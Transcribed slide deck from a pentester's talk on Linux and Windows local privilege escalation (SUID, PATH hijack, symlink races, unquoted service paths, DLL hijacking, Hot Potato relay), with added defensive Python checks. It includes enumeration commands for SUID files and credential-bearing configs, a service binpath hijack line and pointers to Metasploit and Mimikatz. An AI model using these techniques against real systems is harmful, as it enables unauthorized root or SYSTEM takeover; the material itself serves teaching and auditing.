1000 to 0
Sunny Neo

Who am I
• Pen tester from Singapore
• Started learning about security at 15 and still learning
• Want to learn: Reverse Engineering, Kernel Debugging & Exploits

What I am not talking about
• How to use kernel exploits

What I am talking about
• How to find typical misconfigurations made by sysadmins and developers
• How to capitalize on those misconfigurations to gain super user privileges

Why am I talking about this?
• Running a limited shell is not fun
• Running a kernel exploit is a high-risk activity
• Kernel exploits are rare
• Kernel vulnerabilities usually get patched very quickly

Linux Privilege Escalation

SUID/SGID
• Set User ID bit / Set Group ID bit
• Enable users to execute a file with the file owner's/group's permissions
• Improve security by not assigning permissions for sensitive files to every user
-rwsr-xr-x 1 root root 48920 Nov 13 00:58 /usr/bin/passwd

SUID/SGID
What if...
• a buffer overflow exists?
• a command injection exists?
• an interactive shell exists?

SUID/SGID
(Screenshots)
Source: http://www.rebootuser.com/?p=1623

SUID/SGID
Find all SUID/SGID files:
find / -perm /u=s,g=s -type f -exec ls -la {} + 2> /dev/null

sudo
• Enables users to run commands with the privileges of another user
• Commonly found in scripts to run privileged commands without password authentication

sudo
VMware vRealize Appliance (screenshots)
Source: http://www.shellntel.com/blog/2016/6/7/weaponizing-nessus

Weak Folder/File Permission
• Reveals sensitive information in history or configuration files
• Enables modification of important files or scripts executed by init or a cron job

Weak Folder/File Permission
• Look out for
  • Home directory (.rhosts, .ssh/authorized_keys, .bashrc, .*_history)
  • Config files (httpd.conf, my.cnf, config.inc.php, sshd.config)
  • Source code (.php, .c, .cpp, .pl, .py)
  • Init (/etc/rc.*) and cron job (/etc/cron.*/, /var/spool/cron/)
  • Scripts executed by init or a cron job

Weak Folder/File Permission
World-readable files/folders:
find / -perm /o+r -exec ls -la {} + 2>/dev/null
World-writable files/folders:
find / -perm /o+w -exec ls -la {} + 2>/dev/null
Search for 'password' in conf files (the glob is quoted so the shell does not expand it against the current directory):
find / -name '*.conf' -type f -exec grep -Hn password {} + 2>/dev/null

PATH
• Environment variable the shell uses to search for executables
• Meant for convenience, but can be abused when a program invokes commands by relative path

PATH
Assume this is a complex app that allows an authenticated user to view logs; SUID is enabled.
(Screenshots)

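Added example in Python (not the deck's app) showing why a relative command name inside a privileged program is dangerous and how to resolve helper binaries from a fixed directory list instead of the caller's PATH. TRUSTED_DIRS and the constructed fake `cat` are this example's own assumptions.

```python
import os
import shutil
import stat
import tempfile

# Directories a privileged (e.g. SUID) launcher should trust. This list is an
# assumption for the example; a real program would pin it to its install layout.
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def resolve_trusted(cmd, trusted_dirs=TRUSTED_DIRS):
    """Resolve a bare command name against a fixed list of directories.

    The process PATH is deliberately ignored: whoever controls the environment
    of a SUID program can prepend their own directory to PATH and have a
    relative command such as `cat` resolve to their binary instead.
    Returns the absolute path, or None if the command is not in a trusted dir.
    """
    if os.sep in cmd:
        # Callers pass names, never paths; refuse anything that looks like one.
        return None
    for d in trusted_dirs:
        candidate = os.path.join(d, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hardened_env():
    """Minimal environment to pass to subprocess when launching helpers."""
    return {"PATH": os.pathsep.join(TRUSTED_DIRS), "LANG": "C"}


def demo_path_hijack():
    """Compare a PATH lookup with the trusted lookup under a poisoned PATH.

    Builds a writable directory holding a harmless script named `cat` (a
    constructed stand-in for a user-controlled directory), prepends it to
    PATH, and returns what each lookup resolves `cat` to.
    """
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "cat")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho 'not the real cat'\n")
        os.chmod(fake, stat.S_IRWXU)
        old_path = os.environ.get("PATH", "")
        os.environ["PATH"] = tmp + os.pathsep + old_path
        try:
            via_path = shutil.which("cat")      # honours PATH: finds the fake
            via_trusted = resolve_trusted("cat")  # ignores PATH: real cat or None
        finally:
            os.environ["PATH"] = old_path
        return {"via_path": via_path, "via_trusted": via_trusted, "fake": fake}


if __name__ == "__main__":
    r = demo_path_hijack()
    print("PATH lookup   :", r["via_path"])
    print("trusted lookup:", r["via_trusted"])
```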
Symbolic Link Attack
• A symbolic link (a.k.a. soft link) points to another file by filename
• Can link to any file regardless of whether the target exists
• Race condition
• Needs a user with write access to the directory holding the link

Symbolic Link Attack
A cron job runs a program to ensure that foo is always writable.
The user has write access to /tmp and can create the symlink foo there.
The user has NO write access to /etc/cron.d/john YET.
After the cron job has executed the program, the user has write access to /etc/cron.d/john.
Source: https://packetstormsecurity.com/files/133692/Ubuntu-Security-Notice-USN-2744-1.html

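Added example (not from the deck or the Ubuntu notice) of the cron-job pattern above in Python: the symlink-following chmod beside a hardened version that opens the path with O_NOFOLLOW and changes the mode through the descriptor, so a planted link is rejected and there is no check-then-use window. The temporary files are constructed stand-ins for /tmp/foo and /etc/cron.d/john.

```python
import os
import stat
import tempfile


def make_writable_unsafe(path):
    """The pattern from the slides: blindly chmod a path under /tmp.

    os.chmod() follows symlinks, so if `path` is a symlink planted by a
    local user, the mode change lands on the link's target instead.
    """
    os.chmod(path, 0o666)


def make_writable_safe(path):
    """Hardened version: never follow a symlink when changing the mode.

    O_NOFOLLOW makes open() fail (ELOOP) if the final component is a
    symlink; fchmod() then acts on the very file we opened, so there is no
    race between a check and the chmod. Returns True on success, False if
    the path was a symlink or not a regular file.
    """
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:
        return False
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            return False
        os.fchmod(fd, 0o666)
        return True
    finally:
        os.close(fd)


def demo():
    """Constructed scenario: 'target' plays /etc/cron.d/john, 'foo' is the
    user-created symlink in /tmp. Returns the target's mode bits after each
    variant runs, plus whether the hardened version accepted the path."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "target")
        link = os.path.join(tmp, "foo")
        with open(target, "w") as f:
            f.write("# cron entry\n")
        os.chmod(target, 0o644)
        os.symlink(target, link)

        make_writable_unsafe(link)                 # follows the link
        after_unsafe = stat.S_IMODE(os.stat(target).st_mode)

        os.chmod(target, 0o644)                    # reset for the second run
        safe_ok = make_writable_safe(link)         # refuses the link
        after_safe = stat.S_IMODE(os.stat(target).st_mode)

        regular_ok = make_writable_safe(target)    # real file still works
        after_regular = stat.S_IMODE(os.stat(target).st_mode)

        return {
            "after_unsafe": after_unsafe,
            "safe_ok": safe_ok,
            "after_safe": after_safe,
            "regular_ok": regular_ok,
            "after_regular": after_regular,
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, oct(v) if isinstance(v, int) else v)
```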
Linux Enumeration Scripts
• LinEnum - http://www.rebootuser.com/?p=1758
• LinuxPrivChecker - www.securitysift.com/download/linuxprivchecker.py

Windows Privilege Escalation

Weak Folder/File Permission
"The vulnerability is due to incorrect installation and permissions settings on binary files during the MSE physical or virtual appliance install procedure. An attacker could exploit this vulnerability by logging into the device and escalating their privileges. A successful exploit could allow the attacker to acquire root-level privileges and take full control of the device."
Source: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151104-privmse

Weak Folder/File Permission
Get the list of services whose binary is not in System32:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> services.txt
Get permissions on each binary:
for /f eol^=^"^ delims^=^" %a in (services.txt) do cmd.exe /c icacls "%a" >> permissions.txt
Source: http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/

Weak Service Permission
• Well-known vulnerability for Windows XP SP1 and Windows Server 2003
• MS06-011 - Upnphost, SCardSvr, SSDPSRV, DnsCache, and DHCP services
Source: http://www.fuzzysecurity.com/tutorials/16.html

Weak Service Permission
• sc config upnphost binpath= " "
Source: http://www.fuzzysecurity.com/tutorials/16.html

Weak Service Permission
Get permissions on services:
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users"|"Everyone"|"Any Other Group" *
Source: http://www.fuzzysecurity.com/tutorials/16.html

Weak Registry Permission
• Services registered on the system are stored in the registry
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
• A weak registry permission lets a non-privileged user modify a service's configuration

Unquoted Service Paths
DisplayName | Name | PathName
hMailServer | hMailServer | C:\Server\Mail Server\hMailServer\Bin\hMailServer.exe RunAsService
Mobile Broadband HL Service | Mobile Broadband HL Service | "C:\ProgramData\MobileBrServ\mbbservice.exe"
VMware Tools | VMTools | "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"

Unquoted Service Paths
• Unquoted service paths containing space(s) lead to ambiguous binary execution
• Windows attempts to execute the path truncated at each space, starting from the first space
• Number of attempted executions = number of spaces + 1

Unquoted Service Paths
C:\Program Files\Service Dir\binary name.exe
1) C:\Program.exe
2) C:\Program Files\Service.exe
3) C:\Program Files\Service Dir\binary.exe
4) C:\Program Files\Service Dir\binary name.exe

Unquoted Service Paths
• Look out for services installed in C:\*Folder*
• "Authenticated Users" has Modify permission on C:\*Folder*, inherited from the C:\ permissions (except for folders created by Windows)

Unquoted Service Paths
The hMailServer service is now registered in Windows with a quoted path, to prevent the service from being vulnerable to "Unquoted service path". Unquoted service paths would allow a user with access to the server where hMailServer runs, but with less privileges than hMailServer, to gain the privileges of hMailServer by creating a new executable and placing it in C:\ProgramFiles\hMailServer\hMailserver.exe.
Not Right!

Unquoted Service Paths
C:\Server\Mail Server\hmailServer\Bin\hMailServer.exe RunAsService
Mail.exe is a reverse shell (demo screenshots)

Unquoted Service Paths
Find all unquoted service paths:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" |findstr /i /v """
Quick exploit:
Use Metasploit - exploit/windows/local/trusted_service_path

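An added Python audit (not from the deck) that applies the rules above: it reads a constructed CSV export with the same columns as the wmic query, keeps auto-start services outside C:\Windows, and expands each unquoted path into the binaries Windows would try, in order, per the "spaces + 1" rule. The CSV layout, the sample rows and the function names are this example's own.

```python
import csv
import io

# Constructed sample export (not captured from a real host). Columns follow the
# wmic query on the slide; the first three rows mirror the deck's table.
SAMPLE_CSV = r'''DisplayName,Name,PathName,StartMode
hMailServer,hMailServer,C:\Server\Mail Server\hMailServer\Bin\hMailServer.exe RunAsService,Auto
Mobile Broadband HL Service,Mobile Broadband HL Service,"""C:\ProgramData\MobileBrServ\mbbservice.exe""",Auto
VMware Tools,VMTools,"""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe""",Auto
Windows Update,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs,Auto
Vendor Agent,vagent,C:\Program Files\Vendor\agent.exe,Auto
Some Manual Svc,manualsvc,C:\Program Files\Vendor\svc host.exe,Manual
'''


def execution_candidates(pathname):
    """Return the binaries Windows may try, in order, for a service PathName.

    A quoted path is unambiguous. For an unquoted path, every prefix that ends
    at a space is tried with .exe appended, until a prefix that already ends in
    .exe is reached (whatever follows it is treated as arguments).
    """
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return [pathname[1:end] if end > 0 else pathname[1:]]
    tokens = pathname.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates


def audit_services(csv_text):
    """Flag auto-start services outside C:\\Windows whose path is ambiguous.

    Returns a list of dicts with the service name, its raw PathName and the
    ordered candidate binaries; a single candidate means the path is safe.
    """
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["PathName"]
        if row["StartMode"].strip().lower() != "auto":
            continue  # same filter as the slide: only auto-start services
        if path.strip().strip('"').lower().startswith("c:\\windows"):
            continue  # same filter as the slide: ignore C:\Windows
        cands = execution_candidates(path)
        if len(cands) > 1:
            findings.append({"name": row["Name"], "path": path, "candidates": cands})
    return findings


def remediation_command(name, exe_path):
    """Standard fix: re-register the service with a quoted binPath via sc."""
    return 'sc config "%s" binPath= "\\"%s\\""' % (name, exe_path)


if __name__ == "__main__":
    for f in audit_services(SAMPLE_CSV):
        print(f["name"], "->", f["candidates"])
        print("  fix:", remediation_command(f["name"], f["candidates"][-1]))
```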
DLL Hijacking
• Dynamic Link Libraries (DLL)
• Shared library concept: allows applications to reuse code in a DLL
• Hijacking happens when an application loads an attacker's DLL instead of the intended DLL

DLL Hijacking
• Loading a non-existent DLL
• Loading a DLL without a fully qualified path

DLL Hijacking
• Windows 32-bit DLL search order with SafeDllSearchMode enabled:
1. Directory from which the application is loaded
2. Windows 32-bit system directory (C:\Windows\System32)
3. Windows 16-bit system directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. Current directory
6. Directories listed in %PATH%

DLL Hijacking
• CVE-2016-2855: Huawei Mobile Broadband HL Service Local Privilege Escalation
• The Huawei Mobile Broadband HL Service 22.001.25.00.03 and earlier uses a weak ACL for the MobileBrServ program data directory, which allows local users to gain SYSTEM privileges by modifying VERSION.dll.

DLL Hijacking
(Screenshots)
Used ExportsToC++ to generate all export functions from C:\Windows\System32\version.dll

Windows Enumeration Script/Tool
• Windows Privesc Check - https://github.com/pentestmonkey/windows-privesc-check

Hot Potato
• Researched and developed by Stephen Breen @ FoxGlove Security
• Combines 3 vulnerabilities to perform privilege escalation:
  • NetBIOS Name Service (NBNS) spoofing
  • Web Proxy Auto-Discovery Protocol (WPAD) man-in-the-middle attack
  • HTTP -> SMB relay

NBNS Spoofing
• Windows resolves a host name in this order:
  • Local hosts file @ C:\Windows\System32\drivers\etc\hosts
  • DNS cache
  • DNS server
  • Local LMHOSTS file @ C:\Windows\System32\drivers\etc\lmhosts.sam
  • NetBIOS broadcast
• Anyone can respond to the NetBIOS broadcast ☺

WPAD Man in the Middle
• WPAD is enabled by default
• IE will automatically look up http://WPAD/wpad.dat for proxy settings

NTLM Authentication
• Challenge-response
• 3 types of messages:
  • Negotiate
  • Challenge
  • Authenticate

SMB -> SMB Relay
• 15-year-old SMB relay/reflection attack
Diagram: the attacker has MITMed the legitimate client's connection to the legitimate SMB server.
(1) Client connects to the SMB server and asks for an NTLM challenge
(2) Attacker connects to the client's SMB service and asks for an NTLM challenge
(3) Client sends the attacker the NTLM challenge
(4) Attacker modifies the client's challenge and sends it back to the client as his own, as the reply to (1)
(5) Client receives the (1) challenge, encrypts it using his credential (hash) and sends it back to the attacker
(6) Attacker sends back the response he received and is successfully authenticated for (2)

SMB -> SMB Relay
• MS08-068 stops this by preventing a challenge from being relayed back to the host that issued it (SMB-to-SMB relay)
• Doesn't stop the cross-protocol attack, HTTP -> SMB relay ☺

HTTP -> SMB Relay
• NTLM is part of Integrated Windows Authentication
• IE supports Integrated Windows Authentication (NTLM authentication)
• Automatic logon is enabled by default for the Intranet zone
• Localhost is part of the Intranet zone ☺

Hot Potato (Windows 7) Steps
1. Start NBNS spoofing for WPAD and start a web server on localhost:80
2. Start Windows Defender Update (runs as NT AUTHORITY\SYSTEM)
3. WPAD settings redirect Windows Defender Update to http://localhost/GETHASHES
4. http://localhost/GETHASHES asks for NTLM authentication, connects to the localhost SMB service to obtain a challenge, then forwards it to Windows Defender Update
5. Windows Defender Update sends the NTLM response
6. Hot Potato resumes the SMB authentication with the NTLM response ☺

DEMO

More stuff
• Pass the Hash
• Mimikatz - scraping cleartext credentials of logged-on users from Windows LSASS memory

Summary
• Non-exhaustive list of privilege escalation techniques
• More awareness has to be raised among sysadmins and developers

Tools
• LinEnum - http://www.rebootuser.com/?p=1758
• LinuxPrivChecker - www.securitysift.com/download/linuxprivchecker.py
• windows-privesc-check - https://github.com/pentestmonkey/windows-privesc-check
• Hot Potato - https://github.com/foxglovesec/Potato
• Mimikatz - https://github.com/gentilkiwi/mimikatz (available in Metasploit and PowerSploit)
• PowerSploit - https://github.com/PowerShellMafia/PowerSploit
• PowerOPS (run PowerShell commands without PowerShell.exe) - https://github.com/fdiskyou/PowerOPS

References
• http://www.vantagepoint.sg/news/48-security-wednesdays-9-local-privilege-escalation-nus-greyhats
• https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
• http://www.dankalia.com/tutor/01005/0100501004.htm
• http://netsec.ws/?p=309
• http://www.fuzzysecurity.com/tutorials/16.html
• https://labs.mwrinfosecurity.com/system/assets/760/original/Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
• http://toshellandback.com/2015/11/24/ms-priv-esc/
• https://foxglovesecurity.com/2016/01/16/hot-potato/
• https://squirtle.googlecode.com/files/NTLM%20is%20Dead%20-%20DefCon%2016.pdf
More Related Content

What's hot

Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
Roo7break
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat Security Conference
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Shakacon
 

What's hot (20)

Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware AnalysisďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
ďżźInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation  Red Pill2017How fun of privilege escalation  Red Pill2017
How fun of privilege escalation Red Pill2017
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 

Similar to 1000 to 0

unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
NetSPI
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
Xavier Ashe
 

Similar to 1000 to 0 (20)

Server hardening
Server hardeningServer hardening
Server hardening
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
So you want to be a security expert
So you want to be a security expertSo you want to be a security expert
So you want to be a security expert
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
 
Securing your Container Environment with Open Source
Securing your Container Environment with Open SourceSecuring your Container Environment with Open Source
Securing your Container Environment with Open Source
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Windows Malware Techniques
Windows Malware TechniquesWindows Malware Techniques
Windows Malware Techniques
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
 
5. centos security
5. centos security5. centos security
5. centos security
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
 
Watch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty ResultsWatch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty Results
 
Unraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudUnraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production Cloud
 
Tokyo OpenStack Summit 2015: Unraveling Docker Security
Tokyo OpenStack Summit 2015: Unraveling Docker SecurityTokyo OpenStack Summit 2015: Unraveling Docker Security
Tokyo OpenStack Summit 2015: Unraveling Docker Security
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Security tools
Security toolsSecurity tools
Security tools
 

Recently uploaded

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Recently uploaded (20)

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu SubbuApidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
Apidays Singapore 2024 - Modernizing Securities Finance by Madhu Subbu
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
